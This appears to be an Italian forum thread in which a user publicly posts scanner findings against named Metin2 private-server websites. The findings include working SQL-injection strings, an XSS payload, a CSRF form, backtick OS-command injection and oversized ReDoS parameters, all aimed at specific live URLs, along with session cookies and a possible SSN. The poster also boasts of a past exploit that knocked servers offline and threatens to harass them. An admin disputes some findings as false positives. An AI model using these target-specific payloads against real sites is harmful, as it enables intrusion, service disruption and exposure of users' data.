Discussione [Possiamo fare di meglio] Uniti contro lamer/kiddies/disturbatori di server

Stato
Discussione chiusa ad ulteriori risposte.
N

NarcoS_Style

Utente Electrum
11 Giugno 2010
352
20
70
160
Ultima modifica:
Il titolo l'ho messo giusto per attirare un pò l'attenzione di tutti voi..si lo so il post è nella sezione sbagliata ma il problema è dei gf dei server italiani quindi lo metto qui..
Sono tornato da poco e rispetto al passato ho visto solamente server chiudere a causa di
Denial Of Service o attacchi da lamer .
(blind sql a portata di mano e altri esempi che mostrerò in futuro)
L'unica cosa che mi è venuta in mente visto che il problema è comune (e fino ad ora sono riuscito a lavorare poco su questa cosa e anche male dato che non c'è l'attenzione che merita la questione) è quello di pubblicare una breve lista delle falle piu o meno pericolose dei server che ho "analizzato" fino ad adesso..
Premetto che sono tutte comuni e tutti facilmente sistemabili..la lista comprende solo 4 o 5 server ma chissà quanti ce ne sono messi ancora peggio..
Il fatto è che per motivi stupidi e falle come queste potete rischiare di perdere il server se script kiddies (americani magari,perchè qui in Italia i bambini sanno solo dossare, non sanno fare nient'altro) si mettessero in testa di farvi fallire.
Io sono tornato per investire su questo progetto come 2 anni fa investii sul progetto Cf Coder
Mi auguro che i GF mi scrivano..
Con questo non mi rendo aperto all'imenso mondo di incapaci che sono sapientini e invece sono dei bambocci limitati...Mi rivolgo a persone mature proprietarie di server.
Concludo dicendo che entro sta notte o domani notte elaborerò gran parte dei fix per queste vulnerabilità e chi vorrà potrà farsi avanti.

+---------------------------------------------------------------+
Hearth Longju [XSS,XSRF,ReDos,BlindSql,SSN]
SSN
URL: "http://www.heartlongju.us/site/index.php?k=880ea6a14ea49e853634fbdc5015a024&setlanguage=1&langurlbits=/calendar/1/day-2013-1-20=&cal_id=&langid=1"
EXAMPLE
Heartlongju Official Board - Unreal Portal
possibly discloses a ssn: "193-12-6707"
BLIND-SQL
http://cms.heartlongju.us/", using HTTP method POST.
EXAMPLE: "recaptcha_challenge_field=56&login=Login&id=d'kc"z'gj'"%2A%2A5%2A(((%3B-%2A%60)&recaptcha_response_field=manual_challenge&pw=FrAmE30.". parameter "id" is injectable
URL:"recaptcha_challenge_field=&login=Login&id=&recaptcha_response_field=manual_challenge&pw="
EXAMPLE:"recaptcha_challenge_field=56&login=Login&id=3419&recaptcha_response_field=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&pw=FrAmE30
OS Commanding (.....WIKIPEDIA)
EXAMPLE: http://cms.heartlongju.us/index.php/%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C2%A0%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%82%C2%A0%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%C2%A2%C3%A2%E2%82%AC%C5%BE%C3%82%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%E2%80%9A%C3%82%C2%A0%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%E2%80%9A%C3%82%C2%AC%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%BE%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C2%A0%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%E2%80%9A%C3%82%C2%A1%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C2%A0%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%E2%80%9A%C3%82%C2%AC%C3%83%C6%92%C3%A2%E2%82%AC%C2%A6%C3%83%E2%80%9A%C3%82%C2%A1%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%E2%80%A6%C3%82%C2%A1%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%9A%C3%82%C2%B6"
URL: GET .:. Heartlongju - Home .:.
method GET.
Host: cms.heartlongju.us
Cookie: PHPSESSID=2ei3lcsp9lmmpseg8v4ebra9j3;
Accept-Encoding: gzip
Accept: */*
Vulnerabilita: OS Commanding
"method of attacking a Web server by remotely gaining access to the operating system (OS) and then executing system commands through ..."


XSS

Script: #' onmouseover=prompt(925221) //
URL: .:. Heartlongju - Home .:.
Cookie: PHPSESSID=e8l3r8dl7qusl308bf6ddtj0h5
Accept-Encoding: gzip,deflate
Host: cms.heartlongju.us
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2012 23:06:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT

ReDos (WIKIPEDIA)

http://cms.heartlongju.us/index.php/%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C2%A0%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%82%C2%A0%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%C2%A2%C3%A2%E2%82%AC%C5%BE%C3%82%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%E2%80%9A%C3%82%C2%A0%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%E2%80%9A%C3%82%C2%AC%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%BE%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C2%A0%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%E2%80%9A%C3%82%C2%A1%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%A2%E2%82%AC%C2%A0%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%9A%C3%82%C2%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%E2%80%9A%C3%82%C2%AC%C3%83%C6%92%C3%A2%E2%82%AC%C2%A6%C3%83%E2%80%9A%C3%82%C2%A1%C3%83%C6%92%C3%86%E2%80%99%C3%83%E2%80%A0%C3%A2%E2%82%AC%E2%84%A2%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%E2%80%A6%C3%82%C2%A1%C3%83%C6%92%C3%86%E2%80%99%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%C2%A1%C3%83%C6%92%C3%A2%E2%82%AC%C5%A1%C3%83%E2%80%9A%C3%82%C2%B6pagina=11111111111111111111111111111111199%21"

Host: cms.heartlongju.us
Cookie: PHPSESSID=2ei3lcsp9lmmpseg8v4ebra9j3;
Accept-Encoding: gzip
Accept: */*
Vulnerabilita: ReDos

RUISINS OF DRAGON [XSRF,BLIND-SQL]

http://www.ruinsofdragon.it/home/index.php?pagina=rank&sv=1

Blind SQL injection was found at: "http://www.ruinsofdragon.it/home/index.php", using HTTP method POST.
The injectable parameter is: "serverID".
This vulnerability was found in the requests with ids 130 to 131.
POST http://www.ruinsofdragon.it/home/index.php?pagina=add_session HTTP/1.1
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.ruinsofdragon.it
Cookie: PHPSESSID=f6fe135805ea3eb675b5e89258536b6c;
Content-Type: application/x-www-form-urlencoded

action=&serverID=52%22%20OR%20%2252%22%3D%2252&serverID=1&passID=FrAmE30.&loginID=3419
[Sun 04 Nov 2012 03:59:26 PM EST] Blind SQL injection was found at:
"http://www.ruinsofdragon.it/home/index.php", using HTTP method POST.
The injectable parameter is: "serverID".

SYNAPSE MT 2 [XSRF HIGH-LEVEL GET-COOKIE]


GET Synapse MT2 - Portale HTTP/1.1
Host: Synapse MT2 - Portale
Cookie: visid_incap_21995=VJCVg7+zSl2ovbaOcJBqWcEQl1AAAAAAAAAAAAAAAAB4reckYYqC3qiKa//n9pqM;
incap_ses_86_21995=rWIZLDwjrwit0Mac2IsxAZdxoPfRRpnZht/b1XCSFes=;
session_id=e5c9d94b77acee89a3d25e6854389d4f
The URL: Synapse MT2 - Portale is vulnerable to cross-site request forgery.
The URL: "http://www.synapsemt2.com/index.php"
sent the cookie: "incap_ses_86_21995=l6NWSROYvkVq18ac2IsxAZchS/4wk1r9qdDVT3wWZx4=;
path=/;
Domain=.synapsemt2.com".
VULNERABILITA: XSRF
EXAMPLE ATTACK:
<form action="http://host/index.php?active_project=0&amp;ajax=true&amp;c=account&amp;a=edit_profile&amp;id=USERID&amp;current=administration" method="post" name="main">
STRINGA CONTENENTE IL CODICE MALIGNO PER FAR ELUDERE IL SERVER
SE UN ADMIN APRE UN PM E C'E' UN CODICE (IMMAGNIE,/[<SRC] ECC ECC) MALIGNO DEL GENERE PUO COMPIERE AZIONI IN STEALTH

FRATERNITY MT 3 [BLIND SQL,XSRF,ReDos]

BLIND SQL
[[URL="http://www.fraternitymt3.net/calendar.php?action=dayview&calendar=1"]Fraternity_MT3 - Calendario[/URL] ONLY GENERIC]
[[URL="http://www.fraternitymt3.net/calendar.php?calendar=1"]Fraternity_MT3 - Calendario[/URL] SQL]
Blind SQL injection was found at: "http://www.fraternitymt3.net/calendar.php",
using HTTP method POST. The injectable parameter is: "year"
/calendar=1&month=12&year=58%22%20OR%20%2258%22%3D%2258

REDOS

calendar=1&month=12&year=58%22%20OR%20%2258%22%3D%2258
calendar=1&month=12&year=58%22%20AND%20%2258%22%3D%2259
GET [URL]http://www.fraternitymt3.net/calendar.php?action=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&calendar=1[/URL]

BLIND SQL
[URL]http://www.fraternitymt3.net/calendar.php?action=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&calendar=1[/URL]
http://www.fraternitymt3.net/calendar.php", using HTTP method GET.
The sent data was: "action=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60

METIN2 INSOMNIA [OS COMMANDNIG,BLIND-SQL]

OS COMMANDING
OS Commanding was found at: "http://metin2insomnia.sytes.net/index.php?s=rankings"
EXAMPLE:"charakter=&suche=Cerca"

"...charakter=%60ping%20-n%202%20localhost%60&suche=Cerca
charakter=%60ping%20-n%204%20localhost%60&suche=Cerca
charakter=%60ping%20-n%202%20localhost%60&suche=Cerca
(..scansione non completata)

IN CONTINUO AGGIORNAMENTO.

[/QUOTE]

DOPO SVARIATI POST ...........

Bella idea ma qui regna l'invidia e l'illusione di essere superiori..
Quando una mano sulla coscienza e pensare che si è nell'ambito di SERVER PRIVATI (GIOCHI (GIOCATTOLI) )
e le conoscienze generali sono molto limitate accettare qualche consiglio non sarebbe male.
Faccio l'esempio di HeartLongju che ha dato per falsi positivi i suoi bug quando dovrebbe accettare il fatto che il suo cms open source fa pena e basta scaricare la versione on line per scannerizzare le variabili in locale. (sarei proprio curioso di vedere le modifiche che ha apportato)
Comunque qui non sono venuto con la presunzione di sapere tutto ma con la certezza di sapere dove mettere mano davanti falle cosi evidenti in quasi tutti i server dato che tutti usano gli stessi script.

Col postare le vulnerabilità non metto in pericolo nessuno dato che i bug ci sono SEMPRE STATI e non sono venuti fuori solo quando li ho scritti io.
A ogni bug c'è un FIX e basterebbe leggere il sorgente per individuarlo, il mio intento era aiutare chi non fosse stato capace a risolvere questa situazione invece di piangersi addosso nel momento del bisogno.
Ma come si è dimostrato nessuno è in grado di tenere chiusa la bocca su argomenti non hanno un minimo di conoscienza, nè autodidatta nè di approfondita.
Purtroppo da quello che ho imparato dopo 2 anni qui è che arrivare e aiutare NON SE NE PARLA..qui tutti si sentono chissà chi e tutti sanno fare tutto quando non hanno capito che quello che sanno fare lo hanno letto da una GUIDA e finita la guida FINITE LE LORO CONOSCENZE
Per far capire qualcosa nel vostro universo virtuale l'unico modo è arrivare sfruttare tutte le vulnerabilità che si trovano e dare fastidio piu possibile ai server.
Sfugge il fatto che 2 anni fa col rilascio del mio exploit per i freebsd 7x l'intero circolo di server italiani è andato off-line e i server andavano in GM-MODE ogni giorno.
Ma questa è un'altra storia, il problema che affligge ora i server sono i ddos e i bug chiudersi gli occhi e sentirsi protetti dietro un mantello di vanità E' INUTILE.
APRITE GLI OCCHI E CHIUDETE LA BOCCA PER QUALSIASI PROBLEMA IO MI METTO IN GIOCO.
Clicca per espandere...
 
Quasi tutti i GF sono a rischio e aspettano che gli crolli il server addosso per resettare e non saper dove mettere mano.
..Prevenire è meglio che curare
 
Che io sappia è impossibile bloccare definitivamente un doss almeno che non si possegga un firewall ma di quelli tosti che hanno grandi aziende eccetera...
 
Ultima modifica:
Su heart hai segnalato:
  • SSN -> È semplicemente il tag di qualche value nel calendario quindi falso positivo
  • BLIND-SQL -> Un altro falso positivo, sul php ho segnato che debbano essere soltanto caratteri alfanumerici su "id"=impossibilità di injectare
  • OS Commanding/ReDos -> Altro falso positivo, il php considera solo ed unicamente "pagina" (che deve essere di 2 caratteri), non c'è rischio di "sovraccaricare"
  • XSS -> Quella xss non ha nulla a che vedere col sito; in teoria stai dando un link contenente codice javascript, è il browser che deve far qualcosa in merito; Sarebbe stato positivo se ci fosse stata possibilità di mettere codice html su qualche pagina del sito (es. plugin commenti di alcuni siti)
Ma comunque, la maggior parte delle vulnerabilità che possono esserci nei campi di un sito non possono essere testate (solo manualmente) se c'è la presenza un "captcha" decente.
 
LollinaNeko ha detto:
Che io sappia è impossibile bloccare definitivamente un doss almeno che non si possegga un firewall ma di quelli tosti che hanno grandi aziende eccetera...
Clicca per espandere...

I DDos si possono evitare e come...soprattutto se eseguiti da lamer con programmini .exe e senza nessuna capacità tecnica...
Per Ddos posso intendere anche un url come questo
http://www.ruinsofdragon.eu/home/index.php", using HTTP method GET. The data sent was: "pagina=BCLuOZKgBcIkfaghEQpOyfMyXTCiwyGysjidcLWlvliLRdsyXRSOCFHQePUEfzoGEfcJqtLHLkRNLobGCllWbUDrIRGkvwCjfExZfeWvwoIIRqyBJWWCbKWDUhINGLccgxoPXBgVHSfBixlfmqXraOJmyAoAFEUmLijWWZSILOSagAiEVkWInbQjJBAYRFVMNrDqNiYIqPmaBxcEsWcTxiQOUrpcgwAYWhUjmyAIVHNKsANwIyoBiJnhtsyyTWDnKezmuCoNKFcWsQWsHQIjxTnOnGHVybuOTLxhBkmwpmFenimAvGowAyTdkXHSPqJflPxswBkjvXuZpexKgePdiOjRMSmlItkzJNqzeVHXEAzfIRxVUyrVHPRLKmRjifjPGXjniCQmElCkhTzIYgPDBehLbEWwWTPJHWBdSTyrkJzRyvSNiDVzyTNAJhNQtgnXUQBhDVUtkUPUzBPvLXNrkVNyyPwxOSyiwiTdRNLbdRNoBtfVZzyTnQuYmoOdMRzeLVcqONxopDkIccnmmmGrzJVzLUpcKlHZLUgpcLbZBZMCrSYmAiKvwrqzYPUpVEItZPYQdIrZfgBIBLukcSLFqZYgsOpmdzjGWOmUBitgfIuePfhiOVtfNRtQdLrofZDkykxCxfiILIidEpendraEvNlEBKZzcbcofniubWrAybQyvjyeRomtOGoyMuiqBedjmHtFzZmHdxFCynxeuZybCeMkzKcbmGrWiTSZhTSjwCJUHmIwmJMPHbTxpWCiztrUnSinQrQpMYQMTSLzKQXQUWsTOZtBMbrjTxhfkVGmshXxRUQhCMBDyzjtvBFNhRuaiRtydxTHdTenMzUKNSVbnuQWQxGTMqyHmImAOuMgsTTzlpGikQKUeNpjuvoNjHnzGUdDkDFRiyFfYnIEEFmFyTgqMpSTIeVONMEGkKqZJiFHNFRkWYUdFIuWWTyCIqjnKPWwPbMNmTTWhOAWjKAfPmlmtqcixBFWgMzgRDyuefOGRkPNJaMxfHwcszmRQyeJjkpENfHtHmzfiTZZjiMGzsWvGpQceNYUfnUxabKXbXyXedyDKLrDIQGWNjVYaqQmeVOVdAxjVlsmIVpbbEANoDBqcTZOIQFhTzyCWdQMMIxlycrCacDerAUfLwuBozMegaJVbYlxmzVREeuBEbyLnGawFoTxSzRHeyZxAWfXPDKGKgIMgikvOZAqUzNDvVGVUdNkNyebHGAiAgaTDaSmABuCwKNgdfHmTDltDrLiGGIzwHuPnwWQhytRyAbUcvVwhFmrrzSJQBmuIouLVVEaowwhGVLqiojVcksMxWzDumIMEXwXOdKcBokhJDLQARkCzZZEwgeGYnPXYAZEWTQVsxFuYVEQIpVEHgGnMMSFQpYUgUHFrxlTiQDVDevlCmfwlgxchfxwgcEMtJxZpgnZZagFDzLacExqXpjZRIQHKuASgZYkzFZniDyxRKUEbtswvzeKuKbgaSKkMOIFKsBesjOUSpGByuVRxHEUIVtCouszKHjkFYTAXwlkCjQquJoRgAJMCDUXQVYoRapCNzSZkECDYfhBTnGddfxmGMUgdennxEOlrTxVHYdckVIwFxYarYHQkonrbRWctjBjSbBvpbsqAGSdrlMzBAdQsnFrWBZwQvxhWyRpiDFfMOeuPXwZTUwFEUycuvrnhCbIbCWoRyPCqJbmFmMTBLEnSRrJnvQUfjSMErCgdjOdmGyinZpMBLbwroFQXnDbEDZKaDaPTzQpzmnFxcBQseNMhKjLtPiScCduWUrITgSXvMAboTOVyuHofJfjwIoSgVfWvyJpOCFPdJOfkdzkDJbycZDotRkhvvUfwEjBbaQhpRBigTMhbSTtcaiuWaMYrwyKNwGrqFbHFJYSpPiLMhFiUwiPdcWvVesLOGWndtPrGwIbYqZlrSsyElHHGUERZMGgqOBnGJOXChqvndHhQSrDRmOokBtSlyFPQZcwSKCZWuCHPyUPSNsQPzzlXPXNPdcRPdJMeFViORtdMNcQNQMuZdLpYFJiooBjhkmutorYZHueoSyDG
Clicca per espandere...

Bug (RuisinsOfDragon)
 
Quindi se ho ben capito lo sbaglio è stato anche degli altri utenti che hanno postato hack per i server e le loro vulnerabilità giusto?....
Se è così allora dovevate pensarci prima cioè per me,tutte queste vulnerabilità oramai le sanno sfruttare tutti perchè qualcuno le ha postate ripetutamente e quindi facilmente reperibili..se invece di postare vulnerabilità si postavano solamente soluzioni,non saremmo arrivati ai livelli di adesso(server chiusi dopo 3 minuti anche da un piccolo doss..)
 
Bella l'idea ma fatta male
Non si dovrebbe postare le vulnerabilità pubblicamente, perchè oltre ai gf ci sono altri 1000 utenti che scoprono (per chi non lo sapeva già) i "punti deboli" più facili da usare e se un gf non rimedia subito può beccarsi dei danni al server causa te che hai detto in giro: ehy, se clicchi qui esplode! (xD)

Sarebbe meglio se crei un gruppo con il quale cerchi i problemi dei server e li dici solo agli admin

=)

Detto ciò finisco perchè non me ne intendo per niente di questo argomento :asd:


cmq bella idea ^^
 
Bella idea ma qui regna l'invidia e l'illusione di essere superiori..
Quando una mano sulla coscienza e pensare che si è nell'ambito di SERVER PRIVATI (GIOCHI (GIOCATTOLI) )
e le conoscienze generali sono molto limitate accettare qualche consiglio non sarebbe male.
Faccio l'esempio di HeartLongju che ha dato per falsi positivi i suoi bug quando dovrebbe accettare il fatto che il suo cms open source fa pena e basta scaricare la versione on line per scannerizzare le variabili in locale. (sarei proprio curioso di vedere le modifiche che ha apportato)
Comunque qui non sono venuto con la presunzione di sapere tutto ma con la certezza di sapere dove mettere mano davanti falle cosi evidenti in quasi tutti i server dato che tutti usano gli stessi script.

Col postare le vulnerabilità non metto in pericolo nessuno dato che i bug ci sono SEMPRE STATI e non sono venuti fuori solo quando li ho scritti io.
A ogni bug c'è un FIX e basterebbe leggere il sorgente per individuarlo, il mio intento era aiutare chi non fosse stato capace a risolvere questa situazione invece di piangersi addosso nel momento del bisogno.
Ma come si è dimostrato nessuno è in grado di tenere chiusa la bocca su argomenti non hanno un minimo di conoscienza, nè autodidatta nè di approfondita.
Purtroppo da quello che ho imparato dopo 2 anni qui è che arrivare e aiutare NON SE NE PARLA..qui tutti si sentono chissà chi e tutti sanno fare tutto quando non hanno capito che quello che sanno fare lo hanno letto da una GUIDA e finita la guida FINITE LE LORO CONOSCENZE
Per far capire qualcosa nel vostro universo virtuale l'unico modo è arrivare sfruttare tutte le vulnerabilità che si trovano e dare fastidio piu possibile ai server.
Sfugge il fatto che 2 anni fa col rilascio del mio exploit per i freebsd 7x l'intero circolo di server italiani è andato off-line e i server andavano in GM-MODE ogni giorno.
Ma questa è un'altra storia, il problema che affligge ora i server sono i ddos e i bug chiudersi gli occhi e sentirsi protetti dietro un mantello di vanità E' INUTILE.
APRITE GLI OCCHI E CHIUDETE LA BOCCA PER QUALSIASI PROBLEMA IO MI METTO IN GIOCO.
 
Stato
Discussione chiusa ad ulteriori risposte.
Indietro
Top Bottom